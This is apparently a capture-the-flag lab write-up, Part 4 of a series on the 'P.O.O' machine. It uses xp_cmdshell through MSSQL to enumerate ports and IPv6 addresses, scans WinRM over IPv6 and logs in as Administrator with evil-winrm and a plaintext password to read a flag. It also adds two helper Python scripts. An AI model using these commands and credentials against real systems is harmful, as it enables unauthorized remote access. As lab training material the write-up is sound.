P.O.O — Part 4: Foothold
Using IIS credentials to move from database access to a system foothold.
💭 Thought Process: “Now that we have the previous flag, let’s continue enumerating the machine to see what else we can discover.”
Local enumeration via the MSSQL shell
Network enumeration
Checking network state on the target through xp_cmdshell, we found several services listening that had not appeared in our initial Nmap scan:
```
SQL (lulz dbo@master)> xp_cmdshell netstat -ano
output
---------------------------------------------------------------------------
NULL
Active Connections
NULL
  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       964
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:1433           0.0.0.0:0              LISTENING       4948
  TCP    0.0.0.0:5357           0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:5985           0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:41433          0.0.0.0:0              LISTENING       4292
  TCP    0.0.0.0:47001          0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:49664          0.0.0.0:0              LISTENING       540
  TCP    0.0.0.0:49665          0.0.0.0:0              LISTENING       1280
  TCP    0.0.0.0:49666          0.0.0.0:0              LISTENING       692
  TCP    0.0.0.0:49667          0.0.0.0:0              LISTENING       1720
  TCP    0.0.0.0:49668          0.0.0.0:0              LISTENING       2308
  TCP    0.0.0.0:49669          0.0.0.0:0              LISTENING       692
  TCP    0.0.0.0:49673          0.0.0.0:0              LISTENING       684
```
Most interesting is port 5985 (WinRM): it is bound to 0.0.0.0, so the service is listening on every IPv4 interface, yet it never showed up in our initial external scan. That points to it being filtered between us and the host, at least over the IPv4 path we scanned.
IPv6 enumeration
We ran ipconfig to inspect the network configuration and discovered IPv6 addresses that we had not scanned:
```
SQL (lulz dbo@master)> xp_cmdshell ipconfig
output
---------------------------------------------------------------------
NULL
Windows IP Configuration
NULL
Ethernet adapter Ethernet0 2:
NULL
   Connection-specific DNS Suffix  . :
   IPv6 Address. . . . . . . . . . . : dead:beef::1001
   IPv6 Address. . . . . . . . . . . : dead:beef::a86d:e75a:e883:d9ab
   Link-local IPv6 Address . . . . . : fe80::9e3a:ab30:8dde:10b%8
   IPv4 Address. . . . . . . . . . . : 10.13.38.11
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : dead:beef::1
                                       fe80::250:56ff:fe94:1921%8
                                       10.13.38.2
NULL
Ethernet adapter Ethernet1 2:
NULL
   Connection-specific DNS Suffix  . :
   IPv4 Address. . . . . . . . . . . : 172.20.128.101
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . :
```
Because we had initially scanned only IPv4, we ran Nmap against one of the global IPv6 addresses on the WinRM port:
```
nmap -Pn -6 dead:beef::a86d:e75a:e883:d9ab -p5985
Starting Nmap 7.95 ( https://nmap.org )
Nmap scan report for dead:beef::a86d:e75a:e883:d9ab
Host is up.
PORT     STATE    SERVICE
5985/tcp filtered wsman
```
Nmap reported 5985 as filtered (no response to the probe) rather than open, so this scan did not by itself confirm reachability. We went ahead and tried a WinRM connection regardless.
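The two commands above produce a lot of text, and the useful part is a short diff: which locally listening ports the external scan never showed us, and which non-link-local IPv6 addresses we have not scanned yet. The following Python script is an added example, not code from the original write-up. It parses netstat and ipconfig output in the format shown above (the sample text is trimmed from the write-up, with two constructed lines marked in the comments to exercise the parser), and it assumes the initial IPv4 Nmap scan returned only ports 80 and 1433.

```python
"""Added example, not part of the original write-up: turn raw
`xp_cmdshell netstat -ano` and `xp_cmdshell ipconfig` output into the two
facts that matter for the foothold, namely which listening ports the
external scan never reported, and which global IPv6 addresses remain
unscanned.  EXTERNALLY_SEEN is an assumption about the Part 1 scan."""
import ipaddress

NETSTAT_OUTPUT = """\
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       964
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:1433           0.0.0.0:0              LISTENING       4948
  TCP    0.0.0.0:5985           0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:49664          0.0.0.0:0              LISTENING       540
  TCP    [::]:5985              [::]:0                 LISTENING       4
  TCP    10.13.38.11:1433       10.10.14.5:51822       ESTABLISHED     4948
"""
# The last two lines above are constructed (an IPv6 wildcard listener and an
# established session) so both address forms and a non-LISTENING state are
# exercised; the rest is trimmed from the write-up's netstat output.

IPCONFIG_OUTPUT = """\
Windows IP Configuration

Ethernet adapter Ethernet0 2:

   Connection-specific DNS Suffix  . :
   IPv6 Address. . . . . . . . . . . : dead:beef::1001
   IPv6 Address. . . . . . . . . . . : dead:beef::a86d:e75a:e883:d9ab
   Link-local IPv6 Address . . . . . : fe80::9e3a:ab30:8dde:10b%8
   IPv4 Address. . . . . . . . . . . : 10.13.38.11
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : dead:beef::1
                                       fe80::250:56ff:fe94:1921%8
                                       10.13.38.2
"""

EXTERNALLY_SEEN = {80, 1433}   # assumption: what the initial IPv4 Nmap scan reported


def listening_ports(netstat_text):
    """Return {port: pid} for every TCP socket in LISTENING state.

    The local address is "ip:port" for IPv4 and "[ip]:port" for IPv6, so
    the port is whatever follows the last colon in either case."""
    ports = {}
    for line in netstat_text.splitlines():
        fields = line.split()
        if len(fields) != 5 or fields[0] != "TCP" or fields[3] != "LISTENING":
            continue
        port = int(fields[1].rpartition(":")[2])
        ports[port] = int(fields[4])
    return ports


def hidden_listeners(local_ports, externally_seen):
    """Ports the host listens on that the external scan never reported.

    Each is either filtered between attacker and host, or only reachable
    over a path (such as IPv6) that was not scanned."""
    return sorted(p for p in local_ports if p not in externally_seen)


def global_ipv6_addresses(ipconfig_text):
    """Extract the host's IPv6 addresses from ipconfig output, dropping
    link-local (fe80::/10) ones, which are not reachable from another
    subnet.  Zone IDs such as "%8" are stripped before parsing."""
    found = []
    for line in ipconfig_text.splitlines():
        if "IPv6 Address" not in line:
            continue
        # The label ends at the first colon; the value may itself contain colons.
        value = line.split(":", 1)[1].strip().split("%", 1)[0]
        addr = ipaddress.IPv6Address(value)
        if not addr.is_link_local:
            found.append(str(addr))
    return found


def nmap_commands(addresses, ports):
    """Nmap needs -6 for IPv6 targets; the address is passed bare
    (square brackets are a URI convention, not an Nmap one)."""
    port_list = ",".join(str(p) for p in ports)
    return [f"nmap -Pn -6 -p{port_list} {addr}" for addr in addresses]


if __name__ == "__main__":
    ports = listening_ports(NETSTAT_OUTPUT)
    hidden = hidden_listeners(ports, EXTERNALLY_SEEN)
    print("listening locally but not seen externally:", hidden)
    for cmd in nmap_commands(global_ipv6_addresses(IPCONFIG_OUTPUT), hidden):
        print(cmd)
```

Run against the real output, the hidden-listener list is the set of ports worth re-probing over IPv6, and the address list is the set of targets to probe them on.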
Local shell as Administrator (WinRM)
We attempted to connect over WinRM with evil-winrm. Passing the IPv6 address directly caused a URI parsing error: as the message shows, evil-winrm interpolates the host into http://<host>:5985/wsman without the square brackets that RFC 3986 requires around an IPv6 literal, so the parser cannot tell the address's own colons from the host:port separator.
```
evil-winrm -i dead:beef::85c0:c939:afde:2943 -u Administrator -p 'EverybodyWantsToWorkAtP.O.O.'
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
Error: An error of type URI::InvalidURIError happened, message is bad URI(is not URI?): "http://dead:beef::85c0:c939:afde:2943:5985/wsman"
Error: Exiting with code 1
```
The workaround is to give the address a name in /etc/hosts and connect by that name, so no IPv6 literal ever reaches the URI parser:
```
# Add this to your hosts file.
dead:beef::1001 poo
```
```
evil-winrm -i poo -u Administrator -p 'EverybodyWantsToWorkAtP.O.O.'
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>
```
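The hosts entry sidesteps the problem; the script below shows the problem itself and the proper fix. It is an added example, not code from the original write-up or from evil-winrm: it builds a WSMan endpoint URL that brackets IPv6 literals as RFC 3986 requires, and uses Python's own URI parser to show how the unbracketed form from the error message above is misread. The address dead:beef::1001 and the alias poo are the write-up's; the default port 5985 is WinRM over HTTP.

```python
"""Added example, not part of the original write-up: why a bare IPv6
literal broke evil-winrm's endpoint URL, and how to build it correctly.

RFC 3986 requires an IPv6 literal in a URI authority to be enclosed in
square brackets; without them a parser cannot distinguish the address's
colons from the host:port separator."""
import ipaddress
from urllib.parse import urlsplit


def wsman_url(host, port=5985, scheme="http"):
    """Build the WinRM endpoint URL, bracketing IPv6 literals.

    DNS names (including a hosts-file alias such as "poo") and IPv4
    literals are used as-is.  Link-local addresses carrying a zone ID
    (fe80::1%8) need RFC 6874 percent-encoding and are out of scope."""
    try:
        version = ipaddress.ip_address(host).version
    except ValueError:
        authority = host                       # not an IP literal: a name
    else:
        authority = f"[{host}]" if version == 6 else host
    return f"{scheme}://{authority}:{port}/wsman"


def endpoint_host_port(url):
    """Return (hostname, port) as a standards-compliant URI parser sees
    them, or None when the authority has no usable host/port split."""
    try:
        parts = urlsplit(url)
        port = parts.port          # raises ValueError on non-numeric port text
    except ValueError:
        return None
    if port is None:
        return None
    return parts.hostname, port


if __name__ == "__main__":
    # What evil-winrm built from the bare literal (shape taken from the error message).
    broken = "http://dead:beef::1001:5985/wsman"
    print(broken, "->", endpoint_host_port(broken))
    fixed = wsman_url("dead:beef::1001")
    print(fixed, "->", endpoint_host_port(fixed))
    alias = wsman_url("poo")
    print(alias, "->", endpoint_host_port(alias))
```

For the unbracketed URL the parser takes "dead" as the host and "beef::1001:5985" as the port and gives up; the bracketed form yields the intended host and port, and the alias form is what the hosts-file workaround produces.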
We now have a foothold as Administrator. We can find the flag on the Administrator’s desktop.
```
*Evil-WinRM* PS C:\Users\Administrator\Documents> dir
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..\Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir

    Directory: C:\Users\Administrator\Desktop

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        3/26/2018   5:29 PM             37 flag.txt

*Evil-WinRM* PS C:\Users\Administrator\Desktop> type flag.txt
POO{ff.....}
```
This completes the Foothold phase of P.O.O. In the next post, we’ll take this Administrator shell and push for Domain Admin, pivoting through credential harvesting, Kerberoasting, and AD abuse paths.
What did we achieve?
- Discovered additional listening services via xp_cmdshell netstat -ano.
- Identified IPv6 addresses and scanned IPv6 services.
- Overcame an IPv6/URI limitation by adding a hosts entry and connecting via evil-winrm.
- Obtained an Administrator shell via WinRM.
Key Learnings & Tips (Foothold Phase)
- Check both IPv4 and IPv6 during local enumeration: a service that is filtered on the IPv4 path you scanned may still be reachable over IPv6, and a netstat listing from inside the host is the quickest way to spot the gap.
- If a tool rejects IPv6 literals, a hosts entry is a pragmatic workaround.
- Use xp_cmdshell for quick local enumeration, but prefer WinRM for interactive Administrator access where possible.
- Inspect typical user locations (Desktop, Documents) immediately after gaining Administrator privileges; flags and secrets frequently live there.
Stay tuned…